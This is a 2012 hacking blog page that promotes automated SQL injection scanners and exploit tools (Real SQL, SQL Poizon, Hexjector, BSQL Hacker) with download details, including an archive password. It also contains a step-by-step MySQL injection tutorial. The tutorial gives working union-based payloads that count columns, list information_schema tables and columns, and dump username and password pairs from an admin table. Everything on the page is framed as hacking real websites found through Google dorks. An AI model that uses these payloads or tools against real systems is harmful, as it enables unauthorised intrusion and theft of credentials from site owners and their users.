Thursday, August 30, 2012

website Hacking With Real SQL : Automatic SQL Injection Tool


REAL SQL was programmed by A Pakistani Hacker Adnan Anjum in REALBasic.

What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you! You can Easily Hack Vuln websites with Real SQL

See The Screen Shots Of Real SQL 

 Here is the search function and you can see it isGiving a vulnerable website 


 
The search is complete and there were Three  vulnerable websites found!



This is the save button making a .txt file of all the working links


 
Showing the contextual menu in the results box


password =  Logie
Download Details 

--------------------------------------------
name: Real SQL 
description: REAL Sql - V0.3 - Logie : Automatic SQL Injection Tool
 size: 1.01 MB
Read more ...>>

sql poison 1.1- sqli exploit scanner+search hunter+injection builder tool

http://itsecteam.com/pic/pic1.jpg

New Features:
"Look n Feel" is more attractive now.
Rich "Context Menu" items.
"Results" contain checkboxes to enable selection.
"Selected Dork" box is editable now for user convenience.
Built-in Browser for "Injection Builder" to check the impact of injection.
"Text Bucket" available for "Injection Builder" to save extra data.
"Insert Order By" button is added to "Injection Builder".
"Internet Browser" with Snapshot and HTML DOM Tree.

Bug Fixes:
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
Progress bar for "Crawler" has been fixed. It will show correct progress now.
Error on importing file is fixed now. You can import files from other directories as well.
"Searchqu" shows invalid results. It is fixed now.

Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool

[Image: scannert.png]
[Image: crawler.png]
[Image: injectionbuilder.png]
[Image: browsere.png]
[Image: sqlerrorlist.png]
[Image: aboutdx.png]

Download:
[Image: injectionorange.png]Link
Read more ...>>

MySQL Injection : Step By Step Tutorial

Learn How To Hack Websites , Mysql Injection Step by Step Tutorial 
 
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on aMySQL Database.
mysql-logo.jpg (399×291)
Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5


Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numberssomewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database


For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
Read more ...>>

Wednesday, August 29, 2012

Hexjector : Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.

Hexjector is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.

Features :
1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Web Application Firewall Detector.
4.Scan For Admin Page
5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection
8.Search For Vulnerable Sites by using Google Dork
9.MD5 Cracker

Download here
Read more ...>>

BSQL Hacker : automated SQL Injection Framework Tool


It's easy to use for beginners and provide great amount of customisation andautomation support for experienced users. Features a nice metasploit alike exploitrepository to share and update SQL Injection exploits.

BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database.
http://madmikesamerica.com/wp-content/uploads/2010/09/computer-virus-iran-power-nuclear.jpgBSQL Hacker aims for experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).

Videos 
 New version is out, it's mostly bug fixes :

images (160×46)http://labs.portcullis.co.uk/application/deep-blind-sql-injection/


 Screenshot




Key Features

  • Easy Mode
    • SQL Injection Wizard
    • Automated Attack Support (database dump)
      • ORACLE
      • MSSQL
      • MySQL (experimental)
  • General
    • Fast and Multithreaded
    • 4 Different SQL Injection Support
      • Blind SQL Injection
      • Time Based Blind SQL Injection
      • Deep Blind (based on advanced time delays) SQL Injection
      • Error Based SQL Injection
    • Can automate most of the new SQL Injection methods those relies on Blind SQL Injection
    • RegEx Signature support
    • Console and GUI Support
    • Load / Save Support
    • Token / Nonce / ViewState etc. Support
    • Session Sharing Support
    • Advanced Configuration Support
    • Automated Attack mode, Automatically extract all database schema and data mode
  • Update / Exploit Repository Features
    • Metasploit alike but exploit repository support
    • Allows to save and share SQL Injection exploits
    • Supports auto-update
    • Custom GUI support for exploits (cookie input, URL input etc.)
  • GUI Features
    • Load and Save
    • Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be show to the user in a GUI)
    • Visually view true and false responses as well as full HTML response, including time and stats
  • Connection Related
    • Proxy Support (Authenticated Proxy Support)
    • NTLM, Basic Auth Support, use default credentials of current user/application
    • SSL (also invalid certificates) Support
    • Custom Header Support
  • Injection Points (only one of them or combination)
    • Query String
    • Post
    • HTTP Headers
    • Cookies
  • Other
    • Post Injection data can be stored in a separated file
    • XML Output (not stable)
    • CSRF protection support (one time session tokens or asp.net viewstate ort similar can be used for separated login sessions, bypassing proxy pages etc.)

Read more ...>>

 

Sponsor

To Top Page Up Page Down To Bottom Auto Scroll Stop Scroll